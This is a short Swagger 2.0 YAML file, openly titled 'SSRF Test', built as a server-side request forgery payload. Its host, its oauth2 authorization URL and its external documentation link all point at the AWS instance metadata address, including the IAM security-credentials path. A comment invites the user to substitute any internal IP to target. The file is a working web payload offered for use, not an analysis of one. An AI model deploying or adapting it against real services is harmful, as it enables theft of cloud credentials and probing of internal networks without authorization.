swagger: '2.0'
info:
  version: "1.0.0"
  title: "SSRF Test"
  description: "Attempting SSRF via Swagger YAML"
host: "169.254.169.254"  # AWS metadata service or any internal IP you want to target
basePath: "/latest/meta-data"  # Specific path on the metadata server
paths:
  /:
    get:
      summary: "SSRF Test Endpoint"
      description: "Fetches from an internal server (SSRF)"
      responses:
        200:
          description: "Successful response from SSRF"

securityDefinitions:
  auth:
    type: oauth2
    authorizationUrl: "http://169.254.169.254/latest/meta-data/iam/security-credentials/" # Metadata URL for AWS
    flow: implicit
    scopes:
      read: "Access internal data"

# Optional external documentation link (for confirmation of SSRF)
externalDocs:
  description: "Check for SSRF Trigger"
  url: "http://169.254.169.254/latest/meta-data/" 
